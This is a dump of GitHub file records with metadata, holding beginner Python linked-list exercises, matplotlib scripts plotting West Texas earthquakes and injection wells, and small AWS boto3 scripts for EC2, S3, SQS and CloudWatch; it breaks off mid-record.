"alphanum_fraction": 0.6061269044876099,
"avg_line_length": 27.5625,
"blob_id": "c9879de41f5d036de4eba5fc33e219b6473489b0",
"content_id": "4c5f27bb0b76769f5d5b6fc2db953d971e022e0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 457,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 16,
"path": "/16_search_linkedlist_iterative.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef serach(head , key):\n while head:\n if head.val == key:\n return True\n head = head.next\n return False\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n key = int(input(\"Enter the key to search : \"))\n print(\"%d is in the linked list : %s\" % (key, str(serach(l1.head, key))))\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4432748556137085,
"alphanum_fraction": 0.4526315927505493,
"avg_line_length": 24.909090042114258,
"blob_id": "c57e5873c8a3db6affa02c944ed131b473bdea48",
"content_id": "abc32aba864a5429aae9f2e98dafe291f4e5ed95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1710,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 66,
"path": "/3_odd_even_together.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "class Node:\n def __init__(self , val = 0 , next = None):\n self.val = val\n self.next = next\nclass LinkedList:\n def __init__(self):\n self.head = None\n def inset_end(self , val = 0):\n if not self.head:\n self.head = Node(val=val)\n else:\n temp = self.head\n while temp.next:\n temp = temp.next\n temp.next = Node(val=val)\n def display(self):\n if not self.head:\n print(\"Linked list is empty!\")\n return\n temp = self.head\n print(\"Linked list is\",end=\"\")\n while temp:\n print(\" -> \"+str(temp.val),end=\"\")\n temp = temp.next\n def reverse(self):\n temp = self.head\n prev = None\n while temp:\n nxt = temp.next\n temp.next = prev\n prev = temp\n temp = nxt\n self.head = prev\n def get_num(self):\n temp = self.head\n num = 0\n i = 0\n while temp:\n num += ((10**i) * temp.val)\n temp = temp.next\n i+=1\n return num\n def odd_even_together(self):\n new_l = LinkedList()\n temp = self.head\n while temp:\n if temp.val %2 == 1:\n new_l.inset_end(temp.val)\n temp = temp.next\n temp = self.head\n while temp:\n if temp.val %2 == 0:\n new_l.inset_end(temp.val)\n temp = temp.next\n return new_l\n \ndef main():\n num = input(\"Enter the number : \")\n l1 = LinkedList()\n for i in num:\n l1.inset_end(int(i))\n l2 = l1.odd_even_together()\n l2.display()\n \nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5630252361297607,
"alphanum_fraction": 0.5764706134796143,
"avg_line_length": 22.84000015258789,
"blob_id": "f1322dfa85d1a59ecf92ac6efd233630d2082c01",
"content_id": "aacc53e483d8ec61feb99dcf92ba1ae3bd61e75a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 595,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 25,
"path": "/38_string_palindrome.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef getString(head):\n Str = \"\"\n while head:\n Str += head.val\n head = head.next\n return Str\ndef isPalindrome(head):\n Str = getString(head)\n # print(str)\n l = len(Str)\n i = 0\n while i < (l // 2):\n if Str[i] != Str[l-i-1]:\n return False\n i+=1\n return True\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1,func=str)\n l1.display()\n print(\"is linkedlist form a palindrome : \",isPalindrome(l1.head))\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6328125,
"alphanum_fraction": 0.6484375,
"avg_line_length": 33.13333511352539,
"blob_id": "c71d67476b98c1ab92c84fc4acd0d99cd583355b",
"content_id": "a368193b4196980a215cc6f4a626906f47af3ed0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 512,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 15,
"path": "/13_length_recursive.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\nclass LinkedListMod(LinkedList):\n def length_recursive(self , node):\n if not node:\n return 0\n else:\n return 1 + self.length_recursive(node.next)\ndef main():\n l1 = LinkedListMod()\n print(\"Length of linked list is = %d\"%(l1.length_recursive(l1.head)))\n CreateLinkedList(l1)\n print(\"Length of linked list is = %d\"%(l1.length_recursive(l1.head)))\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5524861812591553,
"alphanum_fraction": 0.5690608024597168,
"avg_line_length": 29.16666603088379,
"blob_id": "a84dbd97887616ce2164ad592f62178ab39bd247",
"content_id": "38b1d372c3761431b62fe956ec81adb5c407a7b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 181,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 6,
"path": "/LinkedListHelper.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "def CreateLinkedList(l1, func=int):\n print(\"Enter the number : \",end=\"\")\n num = [func(x) for x in input().split(\" \")]\n for i in num:\n l1.insert_end(i)\n return l1\n"
},
{
"alpha_fraction": 0.5173333287239075,
"alphanum_fraction": 0.5393333435058594,
"avg_line_length": 25.3157901763916,
"blob_id": "b7e3fac840e0f92d38dc992a3ab5658ff18372e3",
"content_id": "c8b83fdd41bfe66da73c7e2c7f1ad162a5e5858b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1500,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 57,
"path": "/18_detect_loop_del_loop.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\n\nclass LinkedListMod(LinkedList):\n def display(self , len):\n if not self.head:\n print(\"Linked list is empty!\")\n return\n temp = self.head\n print(\"Linked list is : \", end=\"\")\n count = 0\n while temp and count < len+2:\n print(str(temp.val)+\"->\", end=\"\")\n temp = temp.next\n count += 1\n if temp:\n print(\" ............\")\n print(\"None\")\n\ndef detect_remove_loop(head):\n slow = head\n fast = head.next\n while slow and fast and slow != fast:\n if not fast.next:\n return False\n slow = slow.next\n fast = fast.next.next\n if not slow or not fast:\n return False\n temp1 = head\n temp2 = fast\n while temp1 and temp2:\n while temp2!=temp1 and temp2.next!=fast:\n temp2 = temp2.next\n if temp1==temp2:\n break\n temp1 = temp1.next\n temp2 = fast\n while temp2.next != temp1:\n temp2 = temp2.next\n temp2.next = None\n return True\n \ndef main():\n l1 = LinkedListMod()\n CreateLinkedList(l1)\n l = l1.length()\n n = int(input(\"Enter the pos of loop : \"))\n if l1.getIndex(n):\n tail = l1.get_tail()\n tail.next = l1.getIndex(n)\n l1.display(l)\n detect = detect_remove_loop(l1.head)\n print(\"Is their any loop : \",detect)\n l1.display(10)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5101625919342041,
"alphanum_fraction": 0.5325203537940979,
"avg_line_length": 20.434782028198242,
"blob_id": "769a2ebb587593022e2391a9f1353b3511155473",
"content_id": "b67b9cf43df9d55d917d8b68d519ee04882c87bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 492,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 23,
"path": "/28_sort_012.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef sort(head):\n arr = [0] * 3\n temp = head\n while temp:\n arr[temp.val] += 1\n temp = temp.next\n temp = head\n for i in range(3):\n while arr[i]>0:\n temp.val = i\n temp = temp.next\n arr[i] -= 1\n \ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n sort(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5008090734481812,
"alphanum_fraction": 0.5056634545326233,
"avg_line_length": 23.235294342041016,
"blob_id": "89146dd6fa524d9374e3d7fcae5a1e5b9314b68d",
"content_id": "8265b7e3b5f8ef8c8fa301a6b8fed003de7a7994",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1236,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 51,
"path": "/20_swap_node.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef swap(head , x , y):\n prev_x = None\n cur_x = head\n while cur_x and cur_x.val != x:\n prev_x = cur_x\n cur_x = cur_x.next\n if not cur_x:\n print(\"%d not in Linkedlist.\"%x)\n return\n \n cur_y = head\n prev_y = None\n while cur_y and cur_y.val != y:\n prev_y = cur_y\n cur_y = cur_y.next\n if not cur_y:\n print(\"%d not in Linkedlist.\" % y)\n return\n if not prev_x:\n temp = cur_y.next\n cur_y.next = cur_x.next\n cur_x.next = temp\n prev_y.next = cur_x\n return cur_y\n elif not prev_y:\n temp = cur_y.next\n cur_y.next = cur_x.next\n cur_x.next = temp\n prev_x.next = cur_y\n return cur_x\n else:\n temp = cur_y.next\n cur_y.next = cur_x.next\n prev_y.next = cur_x\n cur_x.next = temp\n prev_x.next = cur_y\n return head\n \n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n x , y = input(\"Enter the x and y : \").split(\" \")\n x , y = int(x) , int(y)\n l1.display()\n l1.head = swap(l1.head , x , y)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6009389758110046,
"alphanum_fraction": 0.6079812049865723,
"avg_line_length": 24.058822631835938,
"blob_id": "8f35dd06f8b9d5f023d022af8fd2c3e3e54ac8cb",
"content_id": "84efb47883d78c1ed534b4253030dd32e2e119c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 426,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/50_pribt_alternate.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef print_alternative(head):\n if not head:\n return\n print(\"Values are : \",end=\"\")\n while head:\n print(head.val,end=\" \")\n if not head.next:\n return\n head = head.next.next\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n print_alternative(l1.head)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4435611963272095,
"alphanum_fraction": 0.45045045018196106,
"avg_line_length": 24.513513565063477,
"blob_id": "4f9461603e5eb53bc10f7a18f40ddfee64e9fa23",
"content_id": "589e706d0e185857a544f833b3217c233644be8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1887,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 74,
"path": "/LinkedList.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "class Node:\n def __init__(self , val = 0 , next = None):\n self.val = val\n self.next = next\nclass LinkedList:\n def __init__(self):\n self.head = None\n def insert_end(self , val = 0):\n if not self.head:\n self.head = Node(val=val)\n else:\n temp = self.head\n while temp.next:\n temp = temp.next\n temp.next = Node(val=val)\n def display(self):\n if not self.head:\n print(\"Linked list is empty!\")\n return\n temp = self.head\n print(\"Linked list is\",end=\"\")\n while temp:\n print(\" -> \"+str(temp.val),end=\"\")\n temp = temp.next\n print()\n def reverse(self):\n temp = self.head\n prev = None\n while temp:\n nxt = temp.next\n temp.next = prev\n prev = temp\n temp = nxt\n self.head = prev\n def get_num(self):\n temp = self.head\n num = 0\n i = 0\n while temp:\n num += ((10**i) * temp.val)\n temp = temp.next\n i+=1\n return num\n def length(self):\n count = 0\n temp = self.head\n while temp:\n count += 1\n temp = temp.next\n return count\n def get_tail(self):\n temp = self.head\n if not temp:\n return None\n while temp.next:\n temp = temp.next\n return temp\n def getIndex(self , k):\n count = 0\n temp = self.head\n if k < 0:\n return None\n while count < k and temp:\n temp = temp.next\n count += 1\n if count != k:\n return None\n if not temp:\n return None\n return temp\n def insert_beg(self , val=0):\n new_node = Node(val)\n new_node.next = self.head\n self.head = new_node"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6126582026481628,
"avg_line_length": 23.6875,
"blob_id": "7cb4bb0d9c836ef7095fcdc0a866fed1b858d66d",
"content_id": "8dca19d3a39fe5be56fb16f016e0bb56440016a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 395,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 16,
"path": "/37_swap_pair.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef swap(head):\n while head:\n if not head.next:\n return\n head.val, head.next.val = head.next.val , head.val\n head = head.next.next\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n swap(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
}
] | 48 |
roshan-koirala/ProgrammingTools | https://github.com/roshan-koirala/ProgrammingTools | 8d4be6e22c41abb605bdc7d1c230c689cd77ab53 | 2f40a40692a5258fcc390874b5a35475bd021420 | 6c6b1da5a0cef1155051576100945ffa5ec713d1 | refs/heads/master | 2020-12-23T20:29:58.686801 | 2020-05-06T13:52:14 | 2020-05-06T13:52:14 | 237,265,803 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.843137264251709,
"alphanum_fraction": 0.843137264251709,
"avg_line_length": 24.5,
"blob_id": "d227f18b458e3b39c04acfd3cedfdf8da8b2ecbd",
"content_id": "7a8b7fe4173f799f026d3ecb788c91ad67df6126",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "roshan-koirala/ProgrammingTools",
"src_encoding": "UTF-8",
"text": "# ProgrammingTools\nThe materials from a coursework\n"
},
{
"alpha_fraction": 0.5082518458366394,
"alphanum_fraction": 0.5666258931159973,
"avg_line_length": 38.409637451171875,
"blob_id": "96eb6bac29eb85cf88970ade2fd3130235bf52f9",
"content_id": "a34baefef8635a5bf023f2d6bbf8e2788ebc86be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3272,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 83,
"path": "/Earthquake_distribution.py",
"repo_name": "roshan-koirala/ProgrammingTools",
"src_encoding": "UTF-8",
"text": "#! python3\n\n\"\"\"\nPlotting the earthquakes in the area \n- For the receent active area (small area)\n- For the longerr time period from old catalog\n\n@ Author: Roshan Koirala\n\"\"\"\n\n#================================================================================\n# Modules\n#================================================================================ \nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n#================================================================================\n# Plotting The Earthquakes around 4.8 ML \n#================================================================================ \nfig = plt.figure(figsize=(10, 10))\nmap = Basemap(llcrnrlat=31.65,urcrnrlat=31.74,llcrnrlon=-104.1,urcrnrlon=-104.,\n projection='tmerc', lat_1=31.67, lat_2=32, lat_0=31, lon_0=-104.05, resolution='c')\n\nmap.drawstates(color='black' )\nmap.drawlsmask(land_color='0.8', grid=5,lakes=True)\nmap.drawrivers(color='navy')\nmap.drawparallels(np.arange(31.66, 31.74, 0.02),labels = (False,True,False,True))\nmap.drawmeridians(np.arange(-104.08, -104, 0.02),labels = (False,True,False,True))\n\n# plot earthquakes\ndf = pd.read_csv('texnet_events.csv')\ntx_lat = df['Lat'].tolist()\ntx_lon = df['Lon'].tolist()\nmagnitude = df['Mag'].tolist()\ndepth = df['Depth'].tolist()\n\nx,y = map(tx_lon,tx_lat)\nmap.scatter(x, y, s=60, c=depth)\nc = plt.colorbar(orientation='horizontal', fraction=0.044, pad=0.05)\nc.set_label(\"Depth\")\n\ndf = pd.read_csv('Well_location.csv')\nwell_lat = df['Lat'].tolist()\nwell_lon = df['Lon'].tolist()\nwell_depth = df['Depth'].tolist()\n\nmap.scatter( well_lon,well_lat,label='Wells ', latlon=True, s=100, color='r', marker='s', alpha=1, edgecolor='k', zorder=4)\n\n\nmap.scatter(-104.0519,31.7033,label='4.8 ML | 6.0 KM ', latlon=True, s=400, marker='*', alpha=1, edgecolor='k', zorder=3)\nplt.title('Earthquake Around the 4.8 ML Epicenter (2018 - Date)', fontweight=\"bold\")\nplt.legend(loc='lower right')\nplt.savefig(\"Eq_around_epi.png\", dpi=500)\nplt.show()\n\n#================================================================================\n# Plotting The Earthquakes For Bigger area\n#================================================================================ \nfig = plt.figure(figsize=(12, 12))\nmap = Basemap(llcrnrlat=29.0,urcrnrlat=34.0,llcrnrlon=-107.0,urcrnrlon=-98.0,\n projection='tmerc', lat_1=31.00, lat_2=33.00, lat_0=31, lon_0=-104.05, resolution='c')\n\nmap.drawstates(color='red', linewidth = 3)\nmap.drawlsmask(land_color='lightgrey', grid=5,lakes=True)\nmap.drawrivers(color='navy')\nmap.drawparallels(np.arange(30., 34., 1.),labels = (False,True,False,True))\nmap.drawmeridians(np.arange(-107., -98, 1.),labels = (False,True,False,True))\n\n# plot earthquakes\ndf = pd.read_csv('All_catalog.csv')\ntx_lat = df['Lat'].tolist()\ntx_lon = df['Lon'].tolist()\n\n\nx,y = map(tx_lon,tx_lat)\nmap.scatter(x, y, s=10, label='Earthquakes',)\nmap.scatter(-104.0519,31.7033,label='4.8 ML', latlon=True, s=400, marker='*', alpha=1, edgecolor='k', zorder=3)\nplt.title('Earthquake Distribution - West Texas (2000 - 2017)', fontweight=\"bold\")\nplt.legend(loc='lower right')\nplt.savefig(\"Eq_all.png\", dpi=500)\nplt.show()\n\n"
},
{
"alpha_fraction": 0.4261859655380249,
"alphanum_fraction": 0.48576849699020386,
"avg_line_length": 29.287355422973633,
"blob_id": "bd7a1f8e1cf1b5520c24511713fa01a74cc6a0dc",
"content_id": "f1413cb2af2d9b196c7f9ed62118582bab6800cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2635,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 87,
"path": "/Time_series.py",
"repo_name": "roshan-koirala/ProgrammingTools",
"src_encoding": "UTF-8",
"text": "# Python3.7\n# author- Roshan KOirala\n\"\"\"\n Plot Earthquake and Injection Time series\n\n\"\"\"\n#==============================================================================\n# Modules\n#==============================================================================\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#==============================================================================\n# Load data\n#==============================================================================\n# Input Files\nfile_recent = 'texnet_events.csv'\nfile_all = 'All_catalog.csv'\nfile_injection = 'Injection.csv'\n\n#==============================================================================\n# plot earthquakes\ndf = pd.read_csv(file_recent)\ndate_eq_recent = df['Date'].tolist()\nmag_eq_recent = df['Mag'].tolist()\n\n\ndf = pd.read_csv(file_all)\ndate_eq_all = df['Date'].tolist()\nmag_eq_all = df['Mag'].tolist()\n\ndf = pd.read_csv(file_injection)\ndate_inj = df['Date'].tolist()\ninj_10932828 = df['10932828'].tolist()\ninj_10933170 = df['10933170'].tolist()\ninj_38938320 = df['38938320'].tolist()\ninj_38930873 = df['38930873'].tolist()\n\n###============================================================================\nfig, ax1 = plt.subplots()\n\n\nax1.plot(date_inj, inj_38930873, 'orange',label='API_38930873')\nax1.plot(date_inj, inj_10933170, 'b', label='API_10933170')\nax1.plot(date_inj, inj_38938320, 'c', label='API_38938320')\nax1.plot(date_inj, inj_10932828, 'k', label='API_10932828')\n\nax2 = ax1.twinx()\nax2.stem(date_eq_recent, mag_eq_recent, 'r', markerfmt='o')\n\nax1.set_xlabel('Year')\nax2.set_ylabel('Recent Earthquake', color='g')\nax1.set_ylabel('Injection Volume (Barrel)', color='b')\nax1.legend(loc='upper left')\n\nplt.show()\n\n\n#==============================================================================\ndir_out = 'plots'\nplot_recent_1 = '4well_injection.png'\n\nplt.savefig('%s/%s'%(dir_out, plot_recent_1))\n#==============================================================================\n\nfig, ax1 = plt.subplots()\nax1.stem(date_eq_recent, mag_eq_recent, 'r', markerfmt='o')\nax1.set_xlabel('Year')\nax1.set_ylabel('Earthquake - magnitude')\n\nplt.show()\nplot_recent_2 = 'Earthquake_latest.png'\n\nplt.savefig('%s/%s'%(dir_out, plot_recent_2))\n#==============================================================================\nfig, ax1 = plt.subplots()\n\n#ax1.stem(date_eq_all, mag_eq_all, 'r', markerfmt='o')\nplt.hist(date_eq_recent, bins=51, color='orange')\nax1.set_xlabel('Year')\nax1.set_ylabel('Frequency')\n\nplt.show()\nplot_all = 'Earthquake_all_hist.png'\n\nplt.savefig('%s/%s'%(dir_out, plot_all))\n"
}
] | 3 |
smadhu1224/aws-python | https://github.com/smadhu1224/aws-python | f0e2e572cd7c2bbc8acc2e3fa10b05f762539de3 | 08f2ae0c77b0155a4e74e2a319dac029ee670305 | d1555ab9ed2f296e50b787d05b663dc4e5d463a0 | refs/heads/master | 2020-07-29T10:38:09.829173 | 2019-04-17T08:57:51 | 2019-04-17T08:57:51 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6409638524055481,
"alphanum_fraction": 0.6746987700462341,
"avg_line_length": 22,
"blob_id": "579736ea0e9bca0725c63ce61b9ee8335ac37c0c",
"content_id": "857ec3a50611597a04d877d0cf99f007e14e0657",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 415,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 18,
"path": "/terminateinstance.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\nclient = boto3.client('ec2')\nres = client.describe_instances()\n\ninstanceList = res['Reservations']\n\ni = 0\n\nwhile i < len(instanceList):\n print(instanceList[i]['Instances'][0]['State']['Name'])\n i = i+1\nid1 = res['Reservations'][0]['Instances'][0]['InstanceId']\nec2 = boto3.resource('ec2')\ninstance = ec2.Instance(id1)\nstate = instance.state['Name']\nif state=='running':\n instance.terminate()\n\n"
},
{
"alpha_fraction": 0.6330274939537048,
"alphanum_fraction": 0.7247706651687622,
"avg_line_length": 35.66666793823242,
"blob_id": "667b894a68ae4a56c66a0a545c3f20b4f0fbe106",
"content_id": "302801159b052a084b748962dd60fac8cb068ca7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 109,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 3,
"path": "/s3downloadfile.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\ns3 = boto3.resource('s3')\nmyfile = s3.Object('suresh0302','s3.py').download_file('mycontent.py')"
},
{
"alpha_fraction": 0.5031185150146484,
"alphanum_fraction": 0.5821205973625183,
"avg_line_length": 21.952381134033203,
"blob_id": "d1b704c2964a6fb69e077cf4c7801026d7b030fc",
"content_id": "da60c4fac4185261d3a2962b39be580cae23cea3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 21,
"path": "/metricstatistics.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nfrom datetime import datetime\nclient = boto3.client('cloudwatch')\n\nresponse = client.get_metric_statistics(\\\n Namespace='AWS/EC2',\\\n MetricName='CPUUtilization',\\\n Dimensions=[\\\n {\\\n 'Name': 'InstanceId',\\\n 'Value': 'i-4e539888'\\\n },\\\n ],\\\n StartTime=datetime(2016,5,20,00,00,00),\\\n EndTime=datetime(2016,5,20,8,30,00),\\\n Period=600,\\\n Statistics=[\\\n 'Average',\\\n ]\\\n)\nprint(response['Datapoints'])"
},
{
"alpha_fraction": 0.650943398475647,
"alphanum_fraction": 0.6886792182922363,
"avg_line_length": 14.285714149475098,
"blob_id": "3e24885175d64c88e316149474a2a93256709444",
"content_id": "c20aa76b27fb0d772cf574f475db7398cf0dab54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 7,
"path": "/s3delete.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\ns3 = boto3.resource('s3')\n\nfor key in bucket.objects.all():\n key.delete()\nbucket.delete()"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7293233275413513,
"avg_line_length": 18.14285659790039,
"blob_id": "e4620758aa0fb44fa9a99754797c374556c456d5",
"content_id": "e3fa24c770fabdc2d930ef8f2d078f07970fd698",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 7,
"path": "/deleteq.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\n# Get the service resource\nsqs = boto3.resource('sqs')\nqueue = sqs.get_queue_by_name(QueueName='test') \n\nqueue.delete()"
},
{
"alpha_fraction": 0.6757532358169556,
"alphanum_fraction": 0.6843615770339966,
"avg_line_length": 33.900001525878906,
"blob_id": "86438f5626c1f8a86c6ee12329bfcf85f24c5a48",
"content_id": "d12c5537f94519f040a9fb50ec4f0d9b08eb6209",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 697,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 20,
"path": "/readingmsgq.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\n# Get the service resource\nsqs = boto3.resource('sqs')\nqueue = sqs.get_queue_by_name(QueueName='test') \n\nmsg = queue.receive_messages(MessageAttributeNames=['Author'],MaxNumberOfMessages=4)\nfor message in msg:\n # Get the custom author message attribute if it was set\n author_text = ''\n if message.message_attributes is not None:\n author_name = message.message_attributes.get('Author').get('StringValue')\n if author_name:\n author_text = ' ({0})'.format(author_name)\n\n # Print out the body and author (if set)\n print('Hello, {0}!{1}'.format(message.body, author_text))\n\n # Let the queue know that the message is processed\n message.delete()"
},
{
"alpha_fraction": 0.8178808093070984,
"alphanum_fraction": 0.8178808093070984,
"avg_line_length": 49.16666793823242,
"blob_id": "7c6e0b538c8d855948e6774058d3352408071f34",
"content_id": "2a0edc3824e81e3b18b2fd374a84cd3d2c20ff6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 6,
"path": "/Readme.txt",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "This directory will hold AWS Examples based on Python\n\nTo run these examples you must have an AWS account \nYou must have the Boto Python Library installed\nYou must run aws configure first to ensure your AWS credentials are saved on your system\nThese will be available under the .awscofigure directory \n"
},
{
"alpha_fraction": 0.6601941585540771,
"alphanum_fraction": 0.708737850189209,
"avg_line_length": 33.66666793823242,
"blob_id": "aaa72298ee17af153b1a6b071e0fb54735a86fc3",
"content_id": "aaff81c5edc4e34e78e160cb3439c09971556fee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 3,
"path": "/s3upload1.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\ns3 = boto3.resource('s3')\ns3.Object('mybucket', 'hello.txt').upload_file('/tmp/hello.txt')"
},
{
"alpha_fraction": 0.6705202460289001,
"alphanum_fraction": 0.6878612637519836,
"avg_line_length": 20.58333396911621,
"blob_id": "262da378d10d0c8a3b42f1d7ec4ae24843d9320e",
"content_id": "fa6ad938453b0e83e9987df9f019988aef0abe37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 519,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 24,
"path": "/queueurl.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nsqs = boto3.resource('sqs')\n\nmyqueue = sqs.get_queue_by_name(QueueName='test')\nprint(myqueue.url)\n\nmyqueue = sqs.get_queue_by_name(QueueName='test')\n\nmessage = myqueue.Messagereceive_messages()\n\nprint(len(message))\n\nif 'Records' in message[0].body:\n\tprint('Correct Message')\nelse:\n\tprint('Test Message')\n\t\ndata = json.loads(message[0].body)\n\nif 'Records' in message[0].body:\n\tprint(data['Records'][0]['s3']['object']['key'])\n\tprint(data['Records'][0]['s3']['bucket']['name'])\nelse:\n\tprint('Test Message')\n "
},
{
"alpha_fraction": 0.48516950011253357,
"alphanum_fraction": 0.4936440587043762,
"avg_line_length": 20.5,
"blob_id": "b9dcdb27c6b3fa7d17426985f67c5c9834b80ce7",
"content_id": "b9c2cd6afb1c32afceadc38028a444e8343c11ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 472,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 22,
"path": "/sendmsgtoq3.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
